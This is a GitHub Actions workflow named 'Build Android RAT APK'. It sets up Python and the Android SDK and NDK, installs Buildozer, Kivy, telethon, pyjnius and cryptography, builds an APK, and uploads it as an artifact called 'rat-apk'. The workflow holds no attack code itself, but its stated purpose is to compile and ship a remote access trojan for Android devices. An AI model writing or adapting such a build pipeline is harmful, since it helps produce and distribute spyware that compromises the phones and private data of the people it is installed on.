name: Build Android RAT APK

on:
  push:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      # Step 1: Checkout the repository code
      - name: Checkout Repository
        uses: actions/checkout@v3

      # Step 2: Set up Python environment
      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.9'

      # Step 3: Install system dependencies
      - name: Install System Dependencies
        run: |
          sudo apt-get update
          sudo apt-get install -y \
            build-essential \
            git \
            python3-dev \
            openjdk-11-jdk \
            zlib1g-dev \
            libncurses5 \
            libncursesw5 \
            libtinfo5 \
            unzip \
            wget

      # Step 4: Install Android SDK
      - name: Install Android SDK
        run: |
          wget -q https://dl.google.com/android/repository/commandlinetools-linux-8512546_latest.zip -O sdk-tools.zip
          unzip sdk-tools.zip -d /usr/local/android-sdk
          export ANDROID_HOME=/usr/local/android-sdk
          echo "ANDROID_HOME=/usr/local/android-sdk" >> $GITHUB_ENV
          yes | /usr/local/android-sdk/cmdline-tools/bin/sdkmanager --sdk_root=/usr/local/android-sdk "platforms;android-33" "build-tools;33.0.0"

      # Step 5: Install Android NDK
      - name: Install Android NDK
        run: |
          wget -q https://dl.google.com/android/repository/android-ndk-r19b-linux-x86_64.zip -O ndk.zip
          unzip ndk.zip -d /usr/local
          echo "ANDROID_NDK_HOME=/usr/local/android-ndk-r19b" >> $GITHUB_ENV

      # Step 6: Install Python dependencies
      - name: Install Python Dependencies
        run: |
          pip install --upgrade pip
          pip install buildozer kivy telethon pyjnius cryptography

      # Step 7: Build the APK with Buildozer
      - name: Build APK
        run: |
          export PATH=$PATH:/usr/local/android-sdk/cmdline-tools/latest/bin:/usr/local/android-sdk/build-tools/33.0.0
          buildozer android debug
        # Retry on failure (optional)
        continue-on-error: true

      # Step 8: Upload the APK as an artifact
      - name: Upload APK Artifact
        uses: actions/upload-artifact@v4  # Updated to v4 (latest stable)
        with:
          name: rat-apk
          path: bin/*.apk
          retention-days: 7
